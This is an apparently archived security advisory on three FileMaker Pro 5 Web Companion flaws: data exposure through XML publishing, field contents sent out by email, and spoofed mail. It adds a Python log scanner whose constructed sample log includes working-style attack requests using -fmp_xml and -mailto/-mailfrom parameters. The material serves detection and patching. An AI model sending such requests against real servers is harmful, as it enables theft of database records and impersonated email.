COMMAND

    FileMaker

SYSTEMS AFFECTED

    FileMaker Pro 5

PROBLEM

    'deepquest' posted the following.  The precise details of how to
    exploit these holes are minimized to prevent compromising the
    integrity of all current Internet-accessible FileMaker Pro 5
    databases and mail servers.  However, details can be easily
    deduced by referencing the FileMaker Pro 5 documentation and by
    consulting the FileMaker XML Technology Overview white paper
    available via the FileMaker XML Central Web site.

    1. Anyone on the Internet can  view all data in a FileMaker  Pro 5
       Web  accessible  database  regardless  of Web Database Security
       preferences set to deny such  access.  With FileMaker Pro  5 it
       is possible to return data  in XML format based upon  a request
       submitted  by  anyone  on  the  Internet.   The  XML publishing
       capabilities of  the FileMaker  Pro 5  Web Companion  cannot be
       disabled separately from the Web Companion.  The XML publishing
       capabilities bypass certain crucial aspects of FileMaker Pro  5
       Web security allowing anyone on the Web to view any data within
       a FileMaker  Pro 5  database.   The hole  allows anyone to view
       sensitive  data  contained  within  FileMaker  Pro  5 databases
       such as credit card  numbers, passwords, employee records,  and
       trade secrets that are not intended for public access.

    2. Anyone on the Internet can use the Web Companion's email
       capabilities to retrieve all data contained in any FileMaker
       Pro 5 Web Companion enabled database regardless of Web Database
       Security preferences set to deny such access.  FileMaker Pro 5
       Web Companion's new email capabilities include the ability to
       specify that any field in a database be used as the format for
       the body of the email message.  This new functionality can be
       accessed through a request submitted by anyone on the Internet.
       The new email capabilities can be used to bypass certain
       crucial aspects of FileMaker Pro 5 Web security allowing anyone
       on the Web to send the contents of any database field via email
       to themselves or a third party.  The hole makes it possible to
       access and rapidly distribute across the Internet sensitive
       information stored in FileMaker Pro 5 databases not intended
       for viewing by the general public.

    3. Anyone  on  the  Internet   can  use  Web  Companion's    email
       capabilities to  send anonymous  or impersonated  email thereby
       compromising the integrity  of any targeted  mail server.   The
       hole  allows  anyone  to  anonymously  flood email accounts and
       mask  or  impersonate  the  true  identity  and  source  of the
       originating  message  making  it  virtually impossible to trace
       the origin of malicious activity.   For example, anyone on  the
       Web could  access any  organization's FileMaker  Pro 5  powered
       Web  site  and  submit  a  query  that  contains commands which
       instruct the Web Companion to send an email from the  president
       of the organization instructing all employees not to show up to
       work.  As the email would originate from the organization's own
       servers, it  would be  virtually impossible  to trace  the true
       location of the perpetrator.  (.../...)
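
    The three holes above are all triggered by ordinary HTTP requests
    to the Web Companion, so until the patch is applied the practical
    check is to look for such requests in the web server's access log.
    The script below is an added example, not part of deepquest's post
    or of FileMaker's code.  It assumes the Web Companion is reached
    through the /FMPro CGI path, that XML output is selected with a
    -format value beginning with -fmp_ (e.g. -format=-fmp_xml), and
    that server-side mail is driven by -mail* parameters (-mailto,
    -mailfrom, -mailsub, -mailhost, -mailformat); those parameter names
    are taken from the FileMaker Pro 5 CDML reference, not from the
    advisory text.  The log lines are Common Log Format and were
    constructed for this example.

```python
"""Flag web-server requests that exercise the FileMaker Pro 5 Web Companion
features described in the advisory: XML publishing (hole 1) and server-side
email (holes 2 and 3).

Added example, not from the advisory.  Parameter conventions below are
assumptions drawn from the FileMaker Pro 5 CDML reference.
"""
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2000:10:00:01 +0000] "GET /FMPro?-db=orders.fp5&-lay=web&-format=list.htm&-findall HTTP/1.0" 200 5120
203.0.113.5 - - [01/May/2000:10:00:07 +0000] "GET /FMPro?-db=orders.fp5&-lay=web&-format=-fmp_xml&-findall HTTP/1.0" 200 98304
198.51.100.9 - - [01/May/2000:10:01:15 +0000] "GET /FMPro?-db=staff.fp5&-lay=web&-format=ok.htm&-mailto=x%40example.net&-mailfrom=president%40example.com&-mailsub=Notice&-mailformat=body_field&-mailhost=mail.example.com&-findall HTTP/1.0" 200 300
198.51.100.9 - - [01/May/2000:10:02:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 1200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed CDML conventions (FileMaker Pro 5 reference, not the advisory):
XML_FORMAT_PREFIX = "-fmp_"   # -format=-fmp_xml / -fmp_dso request XML output
MAIL_PARAM_PREFIX = "-mail"   # -mailto, -mailfrom, -mailsub, -mailhost, -mailformat
WEB_COMPANION_CGI = "/fmpro"  # Web Companion CGI path, compared case-insensitively


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for a Web Companion request that uses XML publishing
    or the email parameters; None for any other request."""
    path, _, query = target.partition("?")
    if not path.lower().endswith(WEB_COMPANION_CGI):
        return None  # not a Web Companion request at all
    params = parse_qs(query, keep_blank_values=True)  # keeps bare -findall etc.

    issues = []
    if any(v.lower().startswith(XML_FORMAT_PREFIX) for v in params.get("-format", [])):
        issues.append("xml_publishing")
    mail = {k.lower(): v[0] for k, v in params.items()
            if k.lower().startswith(MAIL_PARAM_PREFIX)}
    if mail:
        issues.append("email")
    if not issues:
        return None

    return {
        "db": params.get("-db", [""])[0],
        "issues": issues,
        "mailto": mail.get("-mailto"),
        "mailfrom": mail.get("-mailfrom"),
    }


def scan_log(text: str) -> list:
    """Parse CLF lines and return one finding per suspicious Web Companion hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), time=m.group("ts"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        line = f"{f['time']} {f['ip']} db={f['db']} issues={','.join(f['issues'])}"
        if f["mailto"]:
            line += f" mailto={f['mailto']} mailfrom={f['mailfrom']}"
        print(line)
```

    On the sample log this reports the -fmp_xml request against
    orders.fp5 and the -mailto/-mailfrom request against staff.fp5,
    and ignores the plain HTML-format query and the image fetch.  Any
    hit from an address that is not a known administrator is worth
    treating as a probe, since the advisory states these requests
    succeed regardless of the Web Database Security preferences.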

SOLUTION

    Solutions exist; look at:

        http://www.blueworld.com/blueworld/news/05.01.00-FM5_Security.html

    Details and patch for Mac & Windows:

        http://www.filemaker.com/support/webcompanion.html